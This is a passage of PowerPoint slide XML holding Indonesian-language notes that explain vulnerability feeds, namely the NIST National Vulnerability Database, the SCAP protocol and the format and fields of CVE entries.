              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang valid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>National Vulnerability Database (NVD) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tempat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh National Institute of Standards and Technology (NIST) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terperinci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deskripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keparahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpengaruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mitigasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. https://nvd.nist.gov</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>intelijen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform. Banyak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Security Content Automation Protocol (SCAP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> feed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> plug-in (scap.nist.gov). Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendistribusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, SCAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendefinisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> garis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dasar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> target plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sarana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsisten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Common Vulnerabilities and Exposures (CVE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kamus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (cve.mitre.org). Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>elemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membentuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CVE:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> format: CVE-YYYY-####, di mana YYYY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tahun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan #### </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setidaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>empat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digit yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menunjukkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>urutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditemukannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Deskripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>singkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Daftar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>referensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> URL yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tanggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>entri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Kamus CVE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Nasional NIST (nvd.nist.gov). NVD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melengkapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>deskripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
